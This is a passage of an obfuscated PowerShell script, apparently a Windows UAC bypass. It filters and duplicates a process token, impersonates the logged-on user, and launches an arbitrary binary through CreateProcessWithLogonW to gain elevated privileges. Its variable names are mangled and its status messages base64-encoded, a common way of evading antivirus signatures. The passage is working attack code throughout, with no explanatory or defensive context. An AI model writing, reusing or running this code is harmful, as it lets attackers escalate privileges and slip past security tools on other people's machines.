		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAG0AbwBkAGkAZgB5ACAAdABvAGsAZQBuACEACgA=')))
		Break
	}
	${_/=\/\____/\_/\_/} = [IntPtr]::Zero
	if([UACTokenMagic]::NtFilterToken(${____/===\/=\___/=},4,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero,[ref]${_/=\/\____/\_/\_/}) -eq 0) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAqAF0AIABDAHIAZQBhAHQAZQBkACAAcgBlAHMAdAByAGkAYwB0AGUAZAAgAHQAbwBrAGUAbgA=')))
	} else {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAHQAbwAgAGMAcgBlAGEAdABlACAAcgBlAHMAdAByAGkAYwB0AGUAZAAgAHQAbwBrAGUAbgAhAAoA')))
		Break
	}
	${____/===\/=\___/=} = [IntPtr]::Zero
	${___/======\/=====} = New-Object SECURITY_ATTRIBUTES
	if ([UACTokenMagic]::DuplicateTokenEx(${_/=\/\____/\_/\_/},0xc,[ref]${___/======\/=====},2,2,[ref]${____/===\/=\___/=})) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAqAF0AIABEAHUAcABsAGkAYwBhAHQAZQBkACAAcgBlAHMAdAByAGkAYwB0AGUAZAAgAHQAbwBrAGUAbgA=')))
	} else {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAHQAbwAgAGQAdQBwAGwAaQBjAGEAdABlACAAcgBlAHMAdAByAGkAYwB0AGUAZAAgAHQAbwBrAGUAbgAhAAoA')))
		Break
	}
	if([UACTokenMagic]::ImpersonateLoggedOnUser(${____/===\/=\___/=})) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAqAF0AIABTAHUAYwBjAGUAcwBzAGYAdQBsAGwAeQAgAGkAbQBwAGUAcgBzAG8AbgBhAHQAZQBkACAAcwBlAGMAdQByAGkAdAB5ACAAYwBvAG4AdABlAHgAdAA=')))
	} else {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAGkAbQBwAGUAcgBzAG8AbgBhAHQAZQAgAGMAbwBuAHQAZQB4AHQAIQAKAA==')))
		Break
	}
	${_/\_/\/==\_/=\___} = New-Object STARTUPINFO
	${_/\_/\/==\_/=\___}.dwFlags = 0x00000001
	${_/\_/\/==\_/=\___}.wShowWindow = 0x0001
	${_/\_/\/==\_/=\___}.cb = [System.Runtime.InteropServices.Marshal]::SizeOf(${_/\_/\/==\_/=\___})
	${__/\/==\_____/\/\} = New-Object PROCESS_INFORMATION
	${/=\/\/==\__/==\/=} = $Env:SystemRoot
	if ([UACTokenMagic]::CreateProcessWithLogonW($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBhAGEA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YgBiAGIA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwBjAGMA'))), 0x00000002, $BinPath, $Args, 0x04000000, $null, ${/=\/\/==\__/==\/=},[ref]${_/\_/\/==\_/=\___}, [ref]${__/\/==\_____/\/\})) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAqAF0AIABNAGEAZwBpAGMALgAuAAoA')))
	} else {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAHQAbwAgAGMAcgBlAGEAdABlACAAcAByAG8AYwBlAHMAcwAhAAoA')))
		Break
	}
	if (!$ProcPID) {
		${/=\_______/=\_/=\} = [UACTokenMagic]::TerminateProcess(${__/\/===\_/\/\/\/}.hProcess, 1)
	}
}
